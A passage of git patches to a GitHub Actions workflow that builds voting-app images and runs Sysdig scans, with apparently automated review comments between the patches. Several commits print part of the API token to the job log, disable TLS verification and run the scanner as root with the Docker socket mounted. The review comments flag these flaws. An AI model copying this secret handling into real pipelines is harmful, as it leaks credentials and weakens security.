From 698337e6fc2975594d0bef20b945102d74b1e862 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 12:32:07 +0900 Subject: [PATCH 30/73] Fix: Ensure SECURE_API_TOKEN is injected properly --- .github/workflows/scan.yml | 28 +++++++++++++++++----------- 1 file changed, 17 insertions(+), 11 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 99768f4c7c..0883371c60 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml 
@@ -11,51 +11,57 @@ jobs: runs-on: ubuntu-latest steps: - - name: Checkout code + - name: 🛎️ Checkout code uses: actions/checkout@v3 - - name: Build Docker images + - name: 🏗️ Build Docker images run: | docker build -t voting-app ./vote docker build -t worker ./worker docker build -t result ./result - - name: Run Sysdig Scan (voting-app) + - name: 🔍 Run Sysdig Scan (voting-app) + env: + SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} run: | docker run --rm \ --platform linux/amd64 \ --user 0 \ - -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ + -e SECURE_API_TOKEN=$SECURE_API_TOKEN \ -v /var/run/docker.sock:/var/run/docker.sock \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ + scan \ --apiurl https://app.au1.sysdig.com \ - --loglevel info \ --skiptlsverify \ docker://voting-app - - name: Run Sysdig Scan (worker) + - name: 🔍 Run Sysdig Scan (worker) + env: + SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} run: | docker run --rm \ --platform linux/amd64 \ --user 0 \ - -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ + -e SECURE_API_TOKEN=$SECURE_API_TOKEN \ -v /var/run/docker.sock:/var/run/docker.sock \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ + scan \ --apiurl https://app.au1.sysdig.com \ - --loglevel info \ --skiptlsverify \ docker://worker - - name: Run Sysdig Scan (result) + - name: 🔍 Run Sysdig Scan (result) + env: + SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} run: | docker run --rm \ --platform linux/amd64 \ --user 0 \ - -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ + -e SECURE_API_TOKEN=$SECURE_API_TOKEN \ -v /var/run/docker.sock:/var/run/docker.sock \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ + scan \ --apiurl https://app.au1.sysdig.com \ - --loglevel info \ --skiptlsverify \ docker://result From 0c0c1742dde8ded27bbaca93c00e4edf4bfed755 Mon Sep 17 00:00:00 2001 
From: keitahigaki Date: Wed, 16 Jul 2025 12:35:41 +0900 Subject: [PATCH 31/73] Fix: Ensure SECURE_API_TOKEN is injected properly --- .github/workflows/scan.yml | 40 ++++++++++++++++++++++++-------------- 1 file changed, 25 insertions(+), 15 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 0883371c60..8898ba80f6 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml 
@@ -10,58 +10,68 @@ jobs: image-scan: runs-on: ubuntu-latest + env: + SYS_DIG_SECURE_URL: https://app.au1.sysdig.com + steps: - name: 🛎️ Checkout code uses: actions/checkout@v3 - - name: 🏗️ Build Docker images + - name: 🐳 Build Docker images run: | docker build -t voting-app ./vote docker build -t worker ./worker docker build -t result ./result - - name: 🔍 Run Sysdig Scan (voting-app) + - name: 🔍 DEBUG: Check if SECURE_API_TOKEN is available + run: | + echo "🔍 Token Length: ${#SECURE_API_TOKEN}" + echo "🔍 Token Head: ${SECURE_API_TOKEN::5}" + if [ -z "$SECURE_API_TOKEN" ]; then + echo "❌ SECURE_API_TOKEN is NOT set!" + exit 1 + else + echo "✅ SECURE_API_TOKEN is available." + fi env: SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} + + - name: 🔍 Run Sysdig Scan (voting-app) run: | docker run --rm \ --platform linux/amd64 \ --user 0 \ - -e SECURE_API_TOKEN=$SECURE_API_TOKEN \ -v /var/run/docker.sock:/var/run/docker.sock \ + -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - scan \ - --apiurl https://app.au1.sysdig.com \ + --apiurl $SYS_DIG_SECURE_URL \ --skiptlsverify \ + --loglevel debug \ docker://voting-app - name: 🔍 Run Sysdig Scan (worker) - env: - SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} run: | docker run --rm \ --platform linux/amd64 \ --user 0 \ - -e SECURE_API_TOKEN=$SECURE_API_TOKEN \ -v /var/run/docker.sock:/var/run/docker.sock \ + -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - scan \ - --apiurl https://app.au1.sysdig.com \ + --apiurl $SYS_DIG_SECURE_URL \ --skiptlsverify \ + --loglevel debug \ docker://worker - name: 🔍 Run Sysdig Scan (result) - env: - SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} run: | docker run --rm \ --platform linux/amd64 \ --user 0 \ - -e SECURE_API_TOKEN=$SECURE_API_TOKEN \ -v /var/run/docker.sock:/var/run/docker.sock \ + -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ 
- scan \ - --apiurl https://app.au1.sysdig.com \ + --apiurl $SYS_DIG_SECURE_URL \ --skiptlsverify \ + --loglevel debug \ docker://result From bdf3d297a89ece60b4817480b5b53e9bd566b168 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 12:37:51 +0900 Subject: [PATCH 32/73] Fix: Ensure SECURE_API_TOKEN is injected properly --- .github/workflows/scan.yml | 31 +++---------------------------- 1 file changed, 3 insertions(+), 28 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 8898ba80f6..289cefc793 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -17,7 +17,7 @@ jobs: - name: 🛎️ Checkout code uses: actions/checkout@v3 - - name: 🐳 Build Docker images + - name: 🏗️ Build Docker images run: | docker build -t voting-app ./vote docker build -t worker ./worker @@ -41,37 +41,12 @@ jobs: docker run --rm \ --platform linux/amd64 \ --user 0 \ + -v "$(pwd)/scan-logs:/home/nonroot/scan-logs" \ -v /var/run/docker.sock:/var/run/docker.sock \ -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ --apiurl $SYS_DIG_SECURE_URL \ - --skiptlsverify \ - --loglevel debug \ - docker://voting-app - - - name: 🔍 Run Sysdig Scan (worker) - run: | - docker run --rm \ - --platform linux/amd64 \ - --user 0 \ - -v /var/run/docker.sock:/var/run/docker.sock \ - -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ - quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - --apiurl $SYS_DIG_SECURE_URL \ - --skiptlsverify \ --loglevel debug \ - docker://worker - - - name: 🔍 Run Sysdig Scan (result) - run: | - docker run --rm \ - --platform linux/amd64 \ - --user 0 \ - -v /var/run/docker.sock:/var/run/docker.sock \ - -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ - quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - --apiurl $SYS_DIG_SECURE_URL \ --skiptlsverify \ - --loglevel debug \ - docker://result + docker://voting-app From 097f1d71bf0461f8d66aa2ea629b7888ecca7137 Mon Sep 17 00:00:00 2001 
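Review bot: The new debug step echoes `${SECURE_API_TOKEN::5}` and `${#SECURE_API_TOKEN}` into the job log; GitHub's masking only redacts the full secret value, so the five-character prefix and the length are written in clear text and stay in the log history even after the step is later removed. A presence check should print nothing from the value: `if [ -z "$SECURE_API_TOKEN" ]; then echo "SECURE_API_TOKEN is not set"; exit 1; fi`. The step name `🔍 DEBUG: Check if SECURE_API_TOKEN is available` also contains `: ` inside an unquoted scalar, which YAML parses as a nested mapping key and rejects, so this workflow should fail to load as written — quote it or drop the colon. The scan steps meanwhile went back to `-e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }}` inline in the script instead of the step `env:` the debug step uses; keep the `env:` form and pass `-e SECURE_API_TOKEN` without a value.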
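Review bot: Only voting-app is scanned after this hunk — the worker and result scan steps are deleted while all three images are still built on every push to main, so two thirds of the scan coverage disappears under a commit described as a token-injection fix. If one image is enough while debugging, gate the others behind a condition rather than removing them, or loop the three tags in one step so they cannot drift apart. The added `-v "$(pwd)/scan-logs:/home/nonroot/scan-logs"` is mounted into a container running `--user 0`, so anything it writes lands in the workspace as root-owned files that later steps running as the runner user may not be able to clean up.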
From: keitahigaki Date: Wed, 16 Jul 2025 12:39:13 +0900 Subject: [PATCH 33/73] Fix: Ensure SECURE_API_TOKEN is injected properly --- .github/workflows/scan.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 289cefc793..d79a4ffd04 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -24,6 +24,8 @@ jobs: docker build -t result ./result - name: 🔍 DEBUG: Check if SECURE_API_TOKEN is available + env: + SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} run: | echo "🔍 Token Length: ${#SECURE_API_TOKEN}" echo "🔍 Token Head: ${SECURE_API_TOKEN::5}" @@ -33,8 +35,6 @@ jobs: else echo "✅ SECURE_API_TOKEN is available." fi - env: - SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} - name: 🔍 Run Sysdig Scan (voting-app) run: | From c22d653f6947257be642cbaf480ddd31887c1a30 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 12:41:10 +0900 Subject: [PATCH 34/73] Fix: Ensure SECURE_API_TOKEN is injected properly --- .github/workflows/scan.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index d79a4ffd04..b4437d4b12 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -49,4 +49,3 @@ jobs: --loglevel debug \ --skiptlsverify \ docker://voting-app - From 143bf3b656c9e29b08189768cac70a4d4b1c34ce Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 12:43:33 +0900 Subject: [PATCH 35/73] Fix: Ensure SECURE_API_TOKEN is injected properly --- .github/workflows/scan.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index b4437d4b12..d2f00dace3 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml 
@@ -28,7 +28,7 @@ jobs:
 SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
 run: |
 echo "🔍 Token Length: ${#SECURE_API_TOKEN}"
- echo "🔍 Token Head: ${SECURE_API_TOKEN::5}"
+ echo "🔍 Token Head: ${SECURE_API_TOKEN:0:5}"
 if [ -z "$SECURE_API_TOKEN" ]; then
 echo "❌ SECURE_API_TOKEN is NOT set!"
 exit 1
From a6eac462f4da4256c8689e132fd62c74bee81285 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 13:15:50 +0900 Subject: [PATCH 36/73] Fix: Ensure SECURE_API_TOKEN is injected properly --- .github/workflows/scan.yml | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-)
diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml
index d2f00dace3..3274a20c30 100644
--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -14,29 +14,29 @@ jobs:
 SYS_DIG_SECURE_URL: https://app.au1.sysdig.com
 steps:
- - name: 🛎️ Checkout code
+ - name: Checkout code
 uses: actions/checkout@v3
- - name: 🏗️ Build Docker images
+ - name: Build Docker images
 run: |
 docker build -t voting-app ./vote
 docker build -t worker ./worker
 docker build -t result ./result
- - name: 🔍 DEBUG: Check if SECURE_API_TOKEN is available
- env:
- SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
+ - name: Debug: Check if SECURE_API_TOKEN is available
 run: |
- echo "🔍 Token Length: ${#SECURE_API_TOKEN}"
- echo "🔍 Token Head: ${SECURE_API_TOKEN:0:5}"
+ echo "Token Length: ${#SECURE_API_TOKEN}"
+ echo "Token Head: ${SECURE_API_TOKEN:0:5}"
 if [ -z "$SECURE_API_TOKEN" ]; then
- echo "❌ SECURE_API_TOKEN is NOT set!"
+ echo "SECURE_API_TOKEN is NOT set!"
 exit 1
 else
- echo "✅ SECURE_API_TOKEN is available."
+ echo "SECURE_API_TOKEN is available."
 fi
+ env:
+ SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
- - name: 🔍 Run Sysdig Scan (voting-app)
+ - name: Run Sysdig Scan (voting-app)
 run: |
 docker run --rm \
 --platform linux/amd64 \
From f0a0b2918248c7c6809f5259e3f0271e9cf00e15 Mon Sep 17 00:00:00 2001
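Review bot: Stripping the emoji does not make `- name: Debug: Check if SECURE_API_TOKEN is available` parseable — the remaining `: ` inside an unquoted scalar is read by YAML as a second mapping key, and the workflow will be rejected before any step runs; quote it, `name: 'Debug: check that SECURE_API_TOKEN is set'`, or drop the colon. The step still echoes `${SECURE_API_TOKEN:0:5}`, so the first five characters of the secret go into the job log unmasked; keep only the `-z` test and its message. Placing `env:` after `run:` is accepted (key order is not significant), so that part is style only.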
From: keitahigaki Date: Wed, 16 Jul 2025 13:35:20 +0900 Subject: [PATCH 37/73] Fix: Ensure SECURE_API_TOKEN is injected properly --- .github/workflows/scan.yml | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 3274a20c30..e5bb81f002 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -23,18 +23,17 @@ jobs: docker build -t worker ./worker docker build -t result ./result - - name: Debug: Check if SECURE_API_TOKEN is available + - name: Set SECURE_API_TOKEN env and debug run: | - echo "Token Length: ${#SECURE_API_TOKEN}" - echo "Token Head: ${SECURE_API_TOKEN:0:5}" + export SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" + echo "🔍 Token Length: ${#SECURE_API_TOKEN}" + echo "🔍 Token Head: ${SECURE_API_TOKEN:0:5}" if [ -z "$SECURE_API_TOKEN" ]; then - echo "SECURE_API_TOKEN is NOT set!" + echo "❌ SECURE_API_TOKEN is NOT set!" exit 1 else - echo "SECURE_API_TOKEN is available." + echo "✅ SECURE_API_TOKEN is available." fi - env: - SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} - name: Run Sysdig Scan (voting-app) run: | @@ -43,9 +42,10 @@ jobs: --user 0 \ -v "$(pwd)/scan-logs:/home/nonroot/scan-logs" \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ + -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - --apiurl $SYS_DIG_SECURE_URL \ + --apiurl "$SYS_DIG_SECURE_URL" \ --loglevel debug \ --skiptlsverify \ docker://voting-app + From 8d4fd5a9a54b5ad7af478c1ea7bfa8b8671a1094 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 13:38:22 +0900 Subject: [PATCH 38/73] Fix: Ensure SECURE_API_TOKEN is injected properly --- .github/workflows/scan.yml | 18 +++++------------- 1 file changed, 5 insertions(+), 13 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index e5bb81f002..71a48955ab 100644 
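Review bot: `export SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}"` moves the secret from the step `env:` into the script body, where the runner substitutes the raw value into the generated shell file before bash starts; the step `env:` it replaces is the documented way to keep secrets out of script text, and it works equally well with `-e SECURE_API_TOKEN` (no value) on the later `docker run`. The `echo "🔍 Token Head: ${SECURE_API_TOKEN:0:5}"` line is kept, so five characters of the token are still printed to the log on every run. Restoring `env:` and deleting the two `echo` lines would turn this step into a pure presence check.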
--- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -23,9 +23,11 @@ jobs: docker build -t worker ./worker docker build -t result ./result - - name: Set SECURE_API_TOKEN env and debug + - + name: Debug: Check if SECURE_API_TOKEN is available + env: + SECURE_API_TOKEN: "${{ secrets.SECURE_API_TOKEN }}" run: | - export SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" echo "🔍 Token Length: ${#SECURE_API_TOKEN}" echo "🔍 Token Head: ${SECURE_API_TOKEN:0:5}" if [ -z "$SECURE_API_TOKEN" ]; then @@ -37,15 +39,5 @@ jobs: - name: Run Sysdig Scan (voting-app) run: | - docker run --rm \ - --platform linux/amd64 \ - --user 0 \ - -v "$(pwd)/scan-logs:/home/nonroot/scan-logs" \ - -v /var/run/docker.sock:/var/run/docker.sock \ - -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ - quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - --apiurl "$SYS_DIG_SECURE_URL" \ - --loglevel debug \ - --skiptlsverify \ - docker://voting-app + docker run --rm --platform linux/amd64 --user 0 -v "$(pwd)/scan-logs:/home/nonroot/scan-logs" -v /var/run/docker.sock:/var/run/docker.sock -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" quay.io/sysdig/sysdig-cli-scanner:1.22.4 --apiurl "$SYS_DIG_SECURE_URL" --loglevel debug --skiptlsverify docker://voting-app From 6612d2c8deb1e0f2fd0dfc1baa4e17579af885c1 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 16:57:32 +0900 Subject: [PATCH 39/73] Fix: Ensure SECURE_API_TOKEN is injected properly --- .github/workflows/scan.yml | 16 ++++++++++++---- 1 file changed, 12 insertions(+), 4 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 71a48955ab..264381be06 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -23,8 +23,7 @@ jobs: docker build -t worker ./worker docker build -t result ./result - - - name: Debug: Check if SECURE_API_TOKEN is available + - name: Debug env: SECURE_API_TOKEN: "${{ secrets.SECURE_API_TOKEN }}" run: | 
@@ -35,9 +34,18 @@ jobs: exit 1 else echo "✅ SECURE_API_TOKEN is available." - fi - name: Run Sysdig Scan (voting-app) run: | - docker run --rm --platform linux/amd64 --user 0 -v "$(pwd)/scan-logs:/home/nonroot/scan-logs" -v /var/run/docker.sock:/var/run/docker.sock -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" quay.io/sysdig/sysdig-cli-scanner:1.22.4 --apiurl "$SYS_DIG_SECURE_URL" --loglevel debug --skiptlsverify docker://voting-app + docker run --rm \ + --platform linux/amd64 \ + --user 0 \ + -v "$(pwd)/scan-logs:/home/nonroot/scan-logs" \ + -v /var/run/docker.sock:/var/run/docker.sock \ + -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ + quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ + --apiurl "$SYS_DIG_SECURE_URL" \ + --loglevel debug \ + --skiptlsverify \ + docker://voting-app From 621e2e7675806f27b9cd3149e9b6e44aad62a533 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 17:02:39 +0900 Subject: [PATCH 40/73] Fix: Ensure SECURE_API_TOKEN is injected properly --- .github/workflows/scan.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 264381be06..729f01a6dd 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -23,9 +23,9 @@ jobs: docker build -t worker ./worker docker build -t result ./result - - name: Debug + - name: Debug: Check if SECURE_API_TOKEN is available env: - SECURE_API_TOKEN: "${{ secrets.SECURE_API_TOKEN }}" + SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} run: | echo "🔍 Token Length: ${#SECURE_API_TOKEN}" echo "🔍 Token Head: ${SECURE_API_TOKEN:0:5}" @@ -34,6 +34,7 @@ jobs: exit 1 else echo "✅ SECURE_API_TOKEN is available." + fi - name: Run Sysdig Scan (voting-app) run: | From 487ae85f27ec16c2a69295583a9e198876a251d3 Mon Sep 17 00:00:00 2001 
From: keitahigaki Date: Wed, 16 Jul 2025 17:13:55 +0900 Subject: [PATCH 41/73] Fix: Ensure SECURE_API_TOKEN is injected properly --- .github/workflows/scan.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 729f01a6dd..fd883020ed 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -23,7 +23,7 @@ jobs: docker build -t worker ./worker docker build -t result ./result - - name: Debug: Check if SECURE_API_TOKEN is available + - name: Debug env: SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} run: | From 75f811c3b8d64cf76f1515a1b4ab435c66b80695 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 17:17:44 +0900 Subject: [PATCH 42/73] Fix: Ensure SECURE_TOKEN is injected properly --- .github/workflows/scan.yml | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index fd883020ed..dcc8d7c3e8 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -25,15 +25,15 @@ jobs: - name: Debug env: - SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} + SYSDIG_SECURE_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} run: | - echo "🔍 Token Length: ${#SECURE_API_TOKEN}" - echo "🔍 Token Head: ${SECURE_API_TOKEN:0:5}" - if [ -z "$SECURE_API_TOKEN" ]; then - echo "❌ SECURE_API_TOKEN is NOT set!" + echo "🔍 Token Length: ${#SYSDIG_SECURE_TOKEN}" + echo "🔍 Token Head: ${SYSDIG_SECURE_TOKEN:0:5}" + if [ -z "$SYSDIG_SECURE_TOKEN" ]; then + echo "❌ SYSDIG_SECURE_TOKEN is NOT set!" exit 1 else - echo "✅ SECURE_API_TOKEN is available." + echo "✅ SYSDIG_SECURE_TOKEN is available." fi - name: Run Sysdig Scan (voting-app) 
@@ -43,7 +43,7 @@ jobs: --user 0 \ -v "$(pwd)/scan-logs:/home/nonroot/scan-logs" \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ + -e SYSDIG_SECURE_TOKEN="${{ secrets.SYSDIG_SECURE_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ --apiurl "$SYS_DIG_SECURE_URL" \ --loglevel debug \ From 40634cad25b01abb67770615405235ea2555f6a9 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 17:24:20 +0900 Subject: [PATCH 43/73] Fix: Ensure SECURE_TOKEN is injected properly --- .github/workflows/scan.yml | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index dcc8d7c3e8..fd883020ed 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -25,15 +25,15 @@ jobs: - name: Debug env: - SYSDIG_SECURE_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} + SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} run: | - echo "🔍 Token Length: ${#SYSDIG_SECURE_TOKEN}" - echo "🔍 Token Head: ${SYSDIG_SECURE_TOKEN:0:5}" - if [ -z "$SYSDIG_SECURE_TOKEN" ]; then - echo "❌ SYSDIG_SECURE_TOKEN is NOT set!" + echo "🔍 Token Length: ${#SECURE_API_TOKEN}" + echo "🔍 Token Head: ${SECURE_API_TOKEN:0:5}" + if [ -z "$SECURE_API_TOKEN" ]; then + echo "❌ SECURE_API_TOKEN is NOT set!" exit 1 else - echo "✅ SYSDIG_SECURE_TOKEN is available." + echo "✅ SECURE_API_TOKEN is available." fi - name: Run Sysdig Scan (voting-app) @@ -43,7 +43,7 @@ jobs: --user 0 \ -v "$(pwd)/scan-logs:/home/nonroot/scan-logs" \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SYSDIG_SECURE_TOKEN="${{ secrets.SYSDIG_SECURE_TOKEN }}" \ + -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ --apiurl "$SYS_DIG_SECURE_URL" \ --loglevel debug \ From bd118142e3bac2a70c29d7176269e649785dc43f Mon Sep 17 00:00:00 2001 
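Review bot: Renaming the container variable to `SYSDIG_SECURE_TOKEN` changes the name the scanner reads, not only the repository secret it comes from: every other invocation in this series, and the scanner's own documented variable as far as I recall, use `SECURE_API_TOKEN`, so after this change the scanner presumably starts with no token at all (the next commit reverts it). The repository secret name and the in-container variable are independent, so map one onto the other, `-e SECURE_API_TOKEN="${{ secrets.SYSDIG_SECURE_TOKEN }}"`. Better still, give `-e SECURE_API_TOKEN` with no value and set it once in the step's `env:`, so Docker copies it from the environment and the secret is never part of the `docker run` command line.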
From: keitahigaki Date: Wed, 16 Jul 2025 17:34:31 +0900 Subject: [PATCH 44/73] Fix: Ensure SECURE_TOKEN is injected properly --- .github/workflows/scan.yml | 34 +++++++++++++++++----------------- 1 file changed, 17 insertions(+), 17 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index fd883020ed..218b319abd 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -1,42 +1,42 @@ -name: Sysdig Image Scan +name: Voting App Build & Scan on: push: branches: - main + pull_request: workflow_dispatch: jobs: - image-scan: + build-and-scan: runs-on: ubuntu-latest env: SYS_DIG_SECURE_URL: https://app.au1.sysdig.com steps: - - name: Checkout code + - name: Checkout source uses: actions/checkout@v3 - - name: Build Docker images + - name: Set up Docker Buildx + uses: docker/setup-buildx-action@v2 + + - name: Log in to DockerHub (optional) + if: secrets.DOCKERHUB_USERNAME && secrets.DOCKERHUB_TOKEN + uses: docker/login-action@v2 + with: + username: ${{ secrets.DOCKERHUB_USERNAME }} + password: ${{ secrets.DOCKERHUB_TOKEN }} + + - name: Build Voting App images run: | docker build -t voting-app ./vote docker build -t worker ./worker docker build -t result ./result - - name: Debug + - name: Scan image with Sysdig CLI Scanner env: SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} - run: | - echo "🔍 Token Length: ${#SECURE_API_TOKEN}" - echo "🔍 Token Head: ${SECURE_API_TOKEN:0:5}" - if [ -z "$SECURE_API_TOKEN" ]; then - echo "❌ SECURE_API_TOKEN is NOT set!" - exit 1 - else - echo "✅ SECURE_API_TOKEN is available." - fi - - - name: Run Sysdig Scan (voting-app) run: | docker run --rm \ --platform linux/amd64 \ @@ -46,7 +46,7 @@ jobs: -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ --apiurl "$SYS_DIG_SECURE_URL" \ - --loglevel debug \ + --loglevel info \ --skiptlsverify \ docker://voting-app From f0b136a7ce846fdfad339b52343e22b1360a90d1 Mon Sep 17 00:00:00 2001 
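Review bot: The scan still runs with `--skiptlsverify` against the public `https://app.au1.sysdig.com` endpoint, which disables certificate validation on the very connection that carries `SECURE_API_TOKEN`, so an on-path attacker on the runner's network could read the token and the scan results; delete the flag, since that host serves a publicly trusted certificate and the flag is only defensible for a self-hosted backend with a private CA (where the CA bundle should be mounted instead). The step now has `env: SECURE_API_TOKEN`, so `-e SECURE_API_TOKEN` without a value passes it through and avoids re-interpolating `${{ secrets.SECURE_API_TOKEN }}` into the shell line. Adding `pull_request:` means pull requests from forks run this job with empty secrets; the scan step then fails rather than scans, which is the safe outcome, but it deserves a comment next to the trigger so the failure is not mistaken for a scanner bug. The job still mounts `/var/run/docker.sock` and runs the scanner as `--user 0`, which hands the scanner image root-equivalent control of the runner; a `docker save` archive mounted read-only is the lower-privilege input.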
From: keitahigaki Date: Wed, 16 Jul 2025 17:40:33 +0900 Subject: [PATCH 45/73] Fix: Ensure --- .github/workflows/scan.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 218b319abd..4e0d89ceab 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -49,4 +49,3 @@ jobs: --loglevel info \ --skiptlsverify \ docker://voting-app - From 91bf86164f8236c86d9c3d61c0be1581abd2fb12 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 17:44:17 +0900 Subject: [PATCH 46/73] Fix: Ensure --- .github/workflows/scan.yml | 15 +++------------ 1 file changed, 3 insertions(+), 12 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 4e0d89ceab..54afebe676 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -22,7 +22,7 @@ jobs: uses: docker/setup-buildx-action@v2 - name: Log in to DockerHub (optional) - if: secrets.DOCKERHUB_USERNAME && secrets.DOCKERHUB_TOKEN + if: ${{ secrets.DOCKERHUB_USERNAME && secrets.DOCKERHUB_TOKEN }} uses: docker/login-action@v2 with: username: ${{ secrets.DOCKERHUB_USERNAME }} @@ -38,14 +38,5 @@ jobs: env: SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} run: | - docker run --rm \ - --platform 